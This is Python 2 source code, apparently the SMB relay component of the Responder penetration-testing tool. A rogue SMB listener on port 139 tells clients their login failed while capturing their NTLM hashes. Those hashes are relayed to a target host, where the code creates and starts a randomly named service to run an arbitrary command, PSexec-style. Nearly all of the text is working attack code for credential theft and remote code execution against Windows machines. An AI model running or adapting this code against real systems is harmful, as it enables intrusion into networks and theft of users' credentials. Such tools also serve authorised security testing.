def RunRelay(host, Command,Domain): Target = host CMD = Command print "Target is running: ", RunSmbFinger((host, 445)) s = socket(AF_INET, SOCK_STREAM) s.connect((host, 445)) h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x03\xc7",pid="\xff\xfe", tid="\xff\xff") n = SMBNego(Data = SMBNegoData()) n.calculate() packet0 = str(h)+str(n) buffer0 = longueur(packet0)+packet0 s.send(buffer0) data = s.recv(2048) Key = ParseAnswerKey(data,host) DomainMachineName = ParseDomain(data) if data[8:10] == "\x72\x00": try: a = SmbRogueSrv139(Key,Target,DomainMachineName) if a is not None: LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a if Domain is None: Domain = OriginalDomain if ReadData("SMBRelay-Session.txt", Target, Username, CMD): pass else: head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00") t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) except: raise a = None if data[8:10] == "\x73\x6d": print "[+] Relay failed, auth denied. This user doesn't have an account on this target." Logs.info(CLIENTIP+":"+Username) if data[8:10] == "\x73\x0d": print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista" Logs.info(CLIENTIP+":"+Username) ## NtCreateAndx if data[8:10] == "\x73\x00": print "[+] Authenticated, trying to PSexec on target !" head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) t = SMBNTCreateData() t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) ## Fail Handling. if data[8:10] == "\xa2\x22": print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?" ## DCE/RPC Write. if data[8:10] == "\xa2\x00": head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) x = SMBDCEData() x.calculate() f = data[42:44] t = SMBWriteData(FID=f,Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) ## DCE/RPC Read. if data[8:10] == "\x2f\x00": head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) t = SMBReadData(FID=f) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) ## DCE/RPC SVCCTLOpenManagerW. if data[8:10] == "\x2e\x00": head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00") w.calculate() x = SMBDCEPacketData(Data=w) x.calculate() t = SMBWriteData(FID=f,Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) ## DCE/RPC Read Answer. if data[8:10] == "\x2f\x00": head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) t = SMBReadData(FID=f) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) ## DCE/RPC SVCCTLCreateService. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?" print "[+] Creating service" head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) ContextHandler = data[88:108] ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)]) ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)]) FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat' w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD) w.calculate() x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w) x.calculate() t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) ## DCE/RPC Read Answer. if data[8:10] == "\x2f\x00": head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00") t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": print "[+] Failed to create the service" head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars) w.calculate() x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) x.calculate() t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) ## DCE/RPC Read Answer. if data[8:10] == "\x2f\x00": head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00") t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) ## DCE/RPC SVCCTLStartService. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": print "[+] Failed to open the service" ContextHandler = data[88:108] head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler) x = SMBDCEPacketData(Opnum="\x13\x00",Data=w) x.calculate() t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) ## DCE/RPC Read Answer. if data[8:10] == "\x2f\x00": head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00") t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) if data[8:10] == "\x2e\x00": print "[+] Command successful !" Logs.info('Command successful:') Logs.info(Target+","+Username+','+CMD) return True if data[8:10] != "\x2e\x00": return False
print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m' try: while True: data = conn.recv(1024) ##session request 139 if data[0] == "\x81": buffer0 = "\x82\x00\x00\x00" conn.send(buffer0) ##Negotiate proto answer. if data[8:10] == "\x72\x00": head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data)) t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName) t.calculate() packet1 = str(head)+str(t) buffer1 = longueur(packet1)+packet1 conn.send(buffer1) ##Session Setup AndX Request if data[8:10] == "\x73\x00": if Is_Anonymous(data): head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) packet1 = str(head)+str(SMBSessEmpty()) buffer1 = longueur(packet1)+packet1 conn.send(buffer1) else: head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways. buffer1 = longueur(packet1)+packet1 conn.send(buffer1) Credz = ParseHash(data,addr[0],Target) return Credz